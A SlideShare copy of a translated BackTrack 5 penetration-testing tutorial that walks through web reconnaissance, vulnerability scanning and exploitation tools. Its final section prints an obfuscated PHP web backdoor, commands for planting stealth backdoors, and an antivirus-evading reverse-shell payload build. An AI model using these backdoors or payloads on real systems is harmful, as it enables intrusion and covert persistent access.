SlideShare una empresa de Scribd logo

Computer security

Mohamed Abdo
Mohamed Abdo

Copyrighted by Mr.Caleb Bucker and translated by Mohamed Abdel Azim

Tecnología
1 de 22
Descargar para leer sin conexión
Computer Security Written by Caleb Bucker Pen-Tester – Ethical Hacker – Security Researcher http://calebbucker.blogspot.com/ http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker mailto:calebbucker@gmail.com The Original Copy in Spanish Language http://www.sendspace.com/file/gyljvj                                 PENETRATION TESTING Web Analysis ‐ Vulnerability Assessment – Exploitation  Translated By   Mohamed Abdel Azim Mohamed   
Index    • INTRODUCTION • METHODS OF ANALYSIS OF WEB APPLICATIONS 1. NETWORK MAPPING • Nmap • Netifera 2. INFORMATION GATHERING • TheHarvester • Maltego 3. CMS IDENTIFICATION • BlindElephant • CMS-Explorer • WhatWeb 4. IDS/IPS DETECTION • Waffit 5. OPEN SOURCE ANALYSIS • GHDB (Google Hacking DataBase) • Xssed 6. WEB CRAWLERS • WebShag • DirBuster 7. VULNERABILITY ASSESSMENT AND EXPLOITATION • JoomScan • SqlMap • Fimap • Shodan • W3af • Uniscan • Nikto 8. MAINTAINING ACCESS • Weevely • WeBaCoo • MsfPayload 9. CONCLUSIÓN
INTRODUCTION Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate information about web Application, such as the type of plugin you use, either types of Joomla CMS - WordPress or other. This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities that can occur when performing penetration testing. Penetration Testing tests are also used to determine the level of security: a computer, a computer network LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without compromising the information or the availability of services, this is done in order to identify the potential threats in iT systems before the attacker discovers a (external or internal ). This process is also known as Ethical Hacking (Ethical Hacking). To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all the necessary information about web applications, among others. BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS: 1. NETWORK MAPPING: Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of the physical connectivity of the Internet. Network Mapping is often determine the servers and operating systems running on the network. The law and ethics of port scans are complex. An analysis of the network can be detected by humans or automated systems, and is treated as a malicious act. In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in performing their work, which is very useful to us to carry out this method so important in a Web Audit. • NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are available on a network, what services (name and version of the application) offering, what operating systems (and their versions) running, what type of packet filters or firewalls are in use, and dozens of other characteristics. Use: nmap www.sitio-web.com nmap 192.168.1.1
• NETIFERA: Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives) and assets of analysis (analysis of port entity). Identifies the network hosts. This project offers many advantages for security developers and researchers who want to implement new tools as well as the community of users of these tools. This tool is included in BackTrack and is located at the following address: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts – Netifera The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed and we will come out with the target website's and IP's to which will audit.: In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
2. INFORMATION GATHERING The first phase of safety assessment focuses on gathering information as much as possible about a web application. Gathering information is the most critical step of a test web application security. This task can be accomplished in many different ways, using public tools (search engine) scanner, simple sending HTTP requests or requests specially designed, it is possible to apply force to the filter information, for example, the disclosure error message or versions and technologies used. There are basically two types of data collection: active and passive. Passive information gathering is that attackers will not communicate directly with the target and are trying to gather information that is available on the Internet, while in the active collection of information, the attacker will be in direct contact with the object and will be trying to gather information. • THEHARVESTER: The Harvester is a tool to collect email accounts, user names and host names or sub domains from different public sources such as search engines and PGP key servers. Use: /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin • MALTEGO: Maltego is a tool that is based on the application information and forensic and shows how information is connected to each other. With Maltego, we can find relationships that people mostly use today, including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the information gathered, and websites. If we collect information regarding any infrastructure, we can gather relationship between domains and DNS names. Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
ARCHITECTURE OF MALTEGO EXAMPLE
3. CMS IDENTIFICATION • BLINDELEPHANT: BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is quick, has low bandwidth and is highly automated. Use /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms • CMS-EXPLORER: Fingerprinting serves for web applications, can also be used to identify the type of CMS used, therefore, the attack is done according to the obtained information. Use: /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
• WHATWEB: It is another tool used to identify the type of content management systems (CMS), blogging platform, statistics, and servers used Javascript libraries.Has 900 Plugins for web analytics purposes. Use: /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24 4. IDS/IPS DETECTION During the realization of a VA / PT in a domain, the possibility exists that the IDS-IPS services are installed, this can sometimes stop several types of attacks that are made in the domain. A lot of WAF (Web Application Firewall) are sold to companies as a successful technique for mitigating vulnerabilities in Web applications. Luckily, WAF is easy to detect, because most of these use signature-based detection methods, therefore, the attacker can try to encode parameters and try bypassear attack the WAF. In the BackTrack suite includes a useful tool for the detection of IDS-IPS, which is Waffit. • WAFFIT: It is a tool that detects possible Firewall you may have a web server, it is of little use, since detecting the firewall behind the domain is a very important step in the process of penetration testing. Use: /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
5. OPEN SOURCE ANALYSIS Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool. • GHDB: Google Hacking Database, the exploit-db team maintains a database for Google Dork's that can greatly help in Pen-tester's information gathering. We can use the dork's to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect servers running on Microsoft IIS 6.0. • XSSED: http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed. 6. WEB CRAWLERS In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files and folders "hidden" inside a web server. The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero, SQLScan, Deblaze and WebShag. • WEBSHAG: Webshag is a tool programmed in Python, which combines the features useful for Auditing Web Servers as web crawling, URL scanning or file fuzzing. Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
Besides innovative features proposed IDS evasion, intended that the correlation between the application more complicated (for example, using a random sample for each proxy server HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui. • DIRBUSTER: DirBuster is a Java application designed to make Brute Force in the directories and files in web server / application. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within it, then try to find these DirBuster. DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden files and directories. And if that was not enough DirBuster also has the option of making a pure Brute Force. It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment - Web Application Assessment - Web Application Fuzzers – DirBuster
7. VULNERABILITY ASSESSMENT AND EXPLOITATION The stage of vulnerability assessment is where you can explore our goal for errors, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before further attacks, simply because it makes the job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was scanned and found the version of the installed application. Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to find vulnerabilities in respective specific web server. • JOOMSCAN: It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or other, on web servers based on the Joomla platform. • Detects the version of Joomla! is running. • Scan and locate known vulnerabilities in Joomla! and its extensions. • It reports in text or HTML format. • Allow immediate updating via a scanner or svn. • type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others. It can be opened from /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com • SQLMAP: It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities allowing full access to the database of Web servers. It can be opened from /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
• FIMAP: It is a small tool programmed in python which can find, prepare, audit and automatically exploiting Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The objective is to improve the quality Fimap and security of your website. It can be opened from /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
• SHODAN: This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of intelligent information about devices that are connected to the Internet. We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc., are in place. To find if a service is running in the domain, the syntax would be: • hostname: port target.com: 80,21,22 If we simply want to know the results on the host name, simply, the syntax would be: • hostname: target.com • W3AF: Audit is a tool for web applications security, is basically divided into several modules such as Attack, Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These modules come with several modules w3af side, for example, we can select the module XSS Audit assuming it is necessary to perform a particular audit. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can compromise accordingly for further exploitation.
• UNISCAN: A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features: • identification system pages via a web crawler. • Proof of pages found through the GET method. • Test the forms found by the POST method. • Support for SSL requests (HTTPS). • Supports Proxy. • Generate list of sites via Google. • Generate list of sites with Bing. • Client GUI written using perl tk. It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds • NIKTO: It is a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
servers, and version specific problems on over 270 servers. It also checks the server configuration elements, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS), integration with Metasploit, among others. it can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Use: /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com 8. MAITAINING ACCESS Once you access the website (goal), we need to maintain access for future use, because we will not be starting from scratch again and again. To avoid this, we can load the shell backdoors's web or the web page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If so, then administrators can easily detect and remove the rear doors. In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are: • WEEVELY: It is an essential tool for the further exploitation of web applications, and can be used as a back door or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen (), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated functions in a server remote. The following code is an example of the code of the backdoor created by Weevely. -------------------------------------------------------------------------------------------------------------------
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=')); ------------------------------------------------------------------------------------------------------------------- It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Use: /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password • WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header's Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. The download is available from Github: https://github.com/anestisb/WeBaCoo Options: 1) Create obfuscated backdoor 'backdoor.php' with default settings: •. / Webacoo.pl-g-o backdoor.php 2) Create 'raw-backdoor.php' backdoor de-obfuscated using the work "transit": •. / webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set "terminal" connection to the remote host using the default settings: •. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php 4) Set "terminal" connection to the remote host to configure some arguments: •. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
5) Set "terminal" connection to the remote host via HTTP proxy: •. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication: •. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128 7) Set "terminal" connection to the remote host via Tor and record activity: •. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt • MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a reverse TCP connection. The command would be: msfpayload windows/meterpreter/reverse_tcp This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The "R" is used for the output file in RAW data format so that we can then encode. msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This command will create the payload, but it has to be coded to avoid antivirus detection for that matter can be done using the msfencode option to do this, we need to use pipe ("|") windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe -e is used to specify the encoding necessary in this case I'm using the encoding shikata_ga_nai and-t for the type of file extension (exe). For example, if we want to see the list of available encoders MSF, use the following command: msfpayload windows/meterpreter/reverse_tcp -l
9. CONCLUSION These are only a few methods you can follow to make the exploitation of vulnerabilities in a web application. Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the backdoor to avoid detection. I hope this will help you find the vulnerability, exploitation and how to maintain access to your target. My Greeting. References: http://en.wikipedia.org/wiki/Penetration_test http://www.giac.org/certification/web-application-penetration-tester-gwapt http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ https://www.owasp.org/index.php/Web_Application_Penetration_Testing

Recomendados

What is a Hacker (part 2): How data is stolen
What is a Hacker (part 2): How data is stolenWhat is a Hacker (part 2): How data is stolen
What is a Hacker (part 2): How data is stolen
Klaus Drosch
 
Communication security 2021
Communication security 2021Communication security 2021
Communication security 2021
MuhammadusmanRana10
 
What is hacking
What is hackingWhat is hacking
What is hacking
MuhammadUmer411
 
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
EMBplc.com
 
Network Security
Network SecurityNetwork Security
Network Security
VIKAS SINGH BHADOURIA
 
Spyware risk it's time to get smart
Spyware risk it's time to get smartSpyware risk it's time to get smart
Spyware risk it's time to get smart
Kanha Sahu
 
Internet Security in Web 2.0
Internet Security in Web 2.0 Internet Security in Web 2.0
Internet Security in Web 2.0
Arjunsinh Sindhav
 
Hacking
HackingHacking
Hacking
gvsai501
 

Recomendados

What is a Hacker (part 2): How data is stolen
What is a Hacker (part 2): How data is stolenWhat is a Hacker (part 2): How data is stolen
What is a Hacker (part 2): How data is stolen
Klaus Drosch
 
Communication security 2021
Communication security 2021Communication security 2021
Communication security 2021
MuhammadusmanRana10
 
What is hacking
What is hackingWhat is hacking
What is hacking
MuhammadUmer411
 
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
EMBplc.com
 
Network Security
Network SecurityNetwork Security
Network Security
VIKAS SINGH BHADOURIA
 
Spyware risk it's time to get smart
Spyware risk it's time to get smartSpyware risk it's time to get smart
Spyware risk it's time to get smart
Kanha Sahu
 
Internet Security in Web 2.0
Internet Security in Web 2.0 Internet Security in Web 2.0
Internet Security in Web 2.0
Arjunsinh Sindhav
 
Hacking
HackingHacking
Hacking
gvsai501
 
Brute Force Attack
Brute Force AttackBrute Force Attack
Brute Force Attack
Ahmad karawash
 
Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force Attack
HTS Hosting
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
ecmee
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
Mayank Singh
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
Savvius, Inc
 
Cybersecurity Cyber Usalama
Cybersecurity Cyber UsalamaCybersecurity Cyber Usalama
Cybersecurity Cyber Usalama
MuhammadRadwan10
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
shreyng
 
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Storage Switzerland
 
Domain 4 of CEH V11: Network and Perimeter Hacking
Domain 4 of CEH V11: Network and Perimeter HackingDomain 4 of CEH V11: Network and Perimeter Hacking
Domain 4 of CEH V11: Network and Perimeter Hacking
ShivamSharma909
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application Hacking
ShivamSharma909
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server side
cuteboysmith
 
What is Ransomware?
What is Ransomware?What is Ransomware?
What is Ransomware?
Datto
 
Document from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptxDocument from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptx
sidrasagheer1
 
Pegasus
PegasusPegasus
Pegasus
danjspaul
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Manish Mudhliyar
 
Computer Networks 4
Computer Networks 4Computer Networks 4
Computer Networks 4
Mr Smith
 
Cyber crime trends in 2013
Cyber crime trends in 2013 Cyber crime trends in 2013
Cyber crime trends in 2013
The eCore Group
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
Nutan Kumar Panda
 
How To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb DriveHow To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb Drive
kriggins
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
Jorge Orchilles
 

Más contenido relacionado

La actualidad más candente

AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
ecmee
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
Mayank Singh
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
Savvius, Inc
 
Document from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptxDocument from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptx
sidrasagheer1
 

La actualidad más candente (19)

Brute Force Attack
Brute Force AttackBrute Force Attack
Brute Force Attack
 
Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force Attack
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network Attacks
 
Cybersecurity Cyber Usalama
Cybersecurity Cyber UsalamaCybersecurity Cyber Usalama
Cybersecurity Cyber Usalama
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
 
Domain 4 of CEH V11: Network and Perimeter Hacking
Domain 4 of CEH V11: Network and Perimeter HackingDomain 4 of CEH V11: Network and Perimeter Hacking
Domain 4 of CEH V11: Network and Perimeter Hacking
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application Hacking
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server side
 
What is Ransomware?
What is Ransomware?What is Ransomware?
What is Ransomware?
 
Document from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptxDocument from Sidra Saghir Asim.pptx
Document from Sidra Saghir Asim.pptx
 
Pegasus
PegasusPegasus
Pegasus
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Computer Networks 4
Computer Networks 4Computer Networks 4
Computer Networks 4
 
Cyber crime trends in 2013
Cyber crime trends in 2013 Cyber crime trends in 2013
Cyber crime trends in 2013
 

Destacado

Destacado (8)

Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
How To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb DriveHow To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb Drive
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
Backtrack manual Part1
Backtrack manual Part1Backtrack manual Part1
Backtrack manual Part1
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Backtrack Manual Part2
Backtrack Manual Part2Backtrack Manual Part2
Backtrack Manual Part2
 
Backtrack os 5
Backtrack os 5Backtrack os 5
Backtrack os 5
 
Backtrack
BacktrackBacktrack
Backtrack
 

Similar a Computer security

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 

Similar a Computer security (20)

Security Handbook
Security Handbook Security Handbook
Security Handbook
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityMMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Hacking
HackingHacking
Hacking
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Spiffy Spyware Stuff
Spiffy Spyware StuffSpiffy Spyware Stuff
Spiffy Spyware Stuff
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Owasp methodologies of Security testing part1
Owasp methodologies of Security testing part1Owasp methodologies of Security testing part1
Owasp methodologies of Security testing part1
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
website vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperwebsite vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paper
 

Último

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
